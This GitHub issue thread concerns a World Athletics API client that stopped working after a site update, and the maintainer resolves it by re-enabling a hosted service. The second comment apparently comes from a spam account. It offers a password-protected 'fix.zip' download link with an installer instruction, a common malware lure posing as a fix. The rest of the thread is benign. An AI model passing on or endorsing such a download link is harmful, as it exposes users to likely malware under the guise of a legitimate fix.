### ISSUE TITLE
API is not working due to World Athletics update

### ISSUE THREAD

**Issue by AlvaroNovillo** [nimarion/worldathletics#2]
Hello! I just noticed that World Athletics webpage has been updated and the API no longer works with this new update. Are you planning to include support for this new update?

Thanks in advance!

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nimarion** [comment]
@AlvaroNovillo the frontend from World Athletics just changed. The GraphQL Endpoint is still working.
Are you using my provided service instance worldathletics.nimarion.de? This one is currently not online but i can reenable it

**Comment by AlvaroNovillo** [comment]
Yes, I'm using your service instance. Could you reenable it? Thanks in advance!

**Comment by nimarion** [comment]
Its back online on https://worldathletics.nimarion.de 👍
